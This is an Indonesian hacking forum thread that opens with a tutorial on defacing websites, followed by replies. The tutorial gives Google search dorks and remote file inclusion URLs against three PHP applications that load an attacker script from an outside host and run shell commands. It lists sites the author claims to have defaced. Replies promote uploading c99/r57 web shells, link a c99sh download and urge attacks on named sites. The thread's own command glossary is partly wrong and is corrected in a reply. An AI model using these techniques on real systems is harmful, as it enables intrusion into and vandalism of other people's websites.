Saya ingin berbagi pengalaman tentang nge-Deface dan berbagai command command yang bermanfaat bagi kita didalam nge-Deface..

Oke deh ga perlu berpanjang lebar apa itu DEFACE.... wong kita cuman mempelajari bagaimana caranya masuk ke dalam web seseorang yang didalamnya terdapat BUG atau kesalahan kesalahan yang terdapat pada Script atau Link nya..



Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk
tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

- Oneadmin

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:.net
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :
http://target.com/oneadmin/config.php?path[docroot]=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al

- PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki...

nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname%20-a;cd;pwd

- Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki...
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..

http://vampiredirectory.com/hackbalinese.htm
http://stolenwings.com/hackbalinese.htm
http://miserygirl.com/hackbalinese.htm
http://dashfilms.com/hackbalinese.htm


Kunjungi WEb site kami Di www.bali-source.net


Hak Cipta 2005 by #balinesehacker Crew
Join My Channel at #balinesehacker Mirc.dal.net

Haloo...salam kenal from MR.R0cks..

Special Thax's to ...

dEdE_DeFaN-Malanghack.net-Arakbali-SKYstRom

(iseng ngambil dr site bali :P)

oke tuch, tak pelajari dulu yach, ntar kl bingung leh nanya kan

swt, gwe pernah baca nieh article di apa hack.com gitu

jambi_hack kayanya

@jour
(iseng ngambil dr site bali )

lupa wa site nya

temen2 saya baru belajar nich, tolong ada yang bisa bantu ng, ketika saya menggunakan metasploit framework dan telah selesai mengetikkan perintahnya muncul error seperti ini
WARNING: Socket error: Connection failed: Operation now in progress at /home
/framework/lib/Pex/DCERPC.pm line 825.
apa yang salah ya...apakah pada kompie saya ato yang laen , tolong kasih pencerahan
terimakasih

oh iya, koq jambi_hack... bali_hack ding :P

/swt /swt /swt
Why dont u just use that kind of RFI to use the c99 or r57??
Then just easily upload shells on it?? LOL
Why do we need to deface something which vulnerable enough to be taken over??

And i do believe there is something that u need to patch on the site of http://www.bali-source.net
Not quite Critical .. But kinda annoying vulnerabilities believe ..

Thanks.
Th0R

/swt /swt /swt
Why dont u just use that kind of RFI to use the c99 or r57??
Then just easily upload shells on it?? LOL
Why do we need to deface something which vulnerable enough to be taken over??

And i do believe there is something that u need to patch on the site of http://www.bali-source.net
Not quite Critical .. But kinda annoying vulnerabilities believe ..

Thanks.
Th0R
Damn... its right!
but where i can find them? i forget the link to download c99sh.php /pif!
c99sh adalah php shell, yang dapat membuat kamu mengrayangi webserver seseorang
persyaratan nya : ini harus diupload dolo ke webserver orang!
DL : http://rapidshare.de/files/9548673/C99sh.zip.html
gw mau kasi demo, tapi nanti web gw dibabat.... gw ngedeface beberapa site pake ini, dan sedikit cara naif.

Thanks lumayan berguna juga /hmm

sama2 kk.......

sama2 kk.......
boz, ud ada yang ente upload sama c99sh gak /sob... pengen gw obok2 ne /gg /gg /gg

--- Quote ---

cd namadirectory = Melihat Suatu directory
--> koreksi : cd = change directory, pindah ke directory yg dimaksud, bukan lihat.

ls -al = Melihat Suatu Directory Lebih Dalam lagi
--> koreksi : -a = all files termasuk hidden *nix files (file yg dimulai dengan titik)
-l = long listing (tampilkan list panjang), jadi bukan melihat lebih dalam (recursive)

fined = Mengecek Directory directory
--> no comment, dengar aja blom pernah.

wget = MengUpload suatu Files
--> koreksi : wget untuk download, sama dengan flashget di windows

uname -a = Keberadaan Path berada
--> koreksi : ini untuk print informasi sistem, kernel version etc.

PS : semua diatas adalah perintah Linux/*nix/*BSD

- Oneadmin

--- end quote ---

Tequila!

Nggak ngerti /swt gw Pengen belajar nich /gg /no1
http://target.com/oneadmin/config.php?path[docroot]=
docroot apaan /? /swt Gw Pengen Nge Deface Web Skull Gw Fuck Web (http://www.telkomsekolah-online.net/sekolah.php?pathcd)

alah, menurut gw hacking ma bulshit ...>!!!!

so fact, cuma org dalem yg mampu hacking, yg luar mane tau, klo gw pake logaritmany gw bikin logaritma kuadrat, jadi ibaratnye, untuk mengakses satu webadmin, butuh 10x pas, gmn yg hack?

pake bruce attack <<< zaman kuno

klo buat rusuh pake aje ini:
DoS router <<< baru mantab /no1

coba dah masuk ke batam hacker!!!!,,,udh ada yg pernah msk lom !???? klo si dede 23 mah !!! bullshit abissssss

ehh klo bisa !!! coba deface situs laknat ini = > shit sites (lautan.indosiar.com)

Hr Gene LI /? Nggak Zaman /swt Lu Msk Dech Web Nya Terrorist Iraq Atau Nggak Kirim BackDoor / Trojan Horse ke USA Defence Dept /gg

intinya soal deface itu kan menemukan bug pada web dan mengeksploitasi kelemahan tsb...right?

Knp Sih Nggak Ada Yg Berani Bikin Thread , Nyuspin Back Door Ke Web /?

D-Cracker kan hacker, kenapa nggak bikin threadnya bung?

Ayo ditunggu nih tutor nya...

GYIHIHIHIHIHIHH

D-Cracker kan hacker, kenapa nggak bikin threadnya bung?

Ayo ditunggu nih tutor nya...

GYIHIHIHIHIHIHH
__________________
Thanks,
Th1R
IP Lu Gw Cek Ya /pmg Sapa Tau Lu ***r@binus.com /? <-- Understand What I Mean /? Klo Emang Bener Ya Ud /heh Welcome In IF /gg

wah............ ampe sekarang gua ga bisa ngedeface web,,,,

itu diatas command2 buat server Linux...
kalo Files dan Folder nya PAKE CHMOD 777 bakalan jalan...
tinggal pakein cara yang dikasih tau diatas = BLAH... ANCUR KABEH ITU WEB :))

Mangkanya, sebelum ngedeface / hack web...
lo musti tau, Tipe OS, Document Root dll.. biar keliatan gak penting tapi....!

OO..Th0r kok di banned yah disini? Maaf masih baru :)

Regard,

zoiz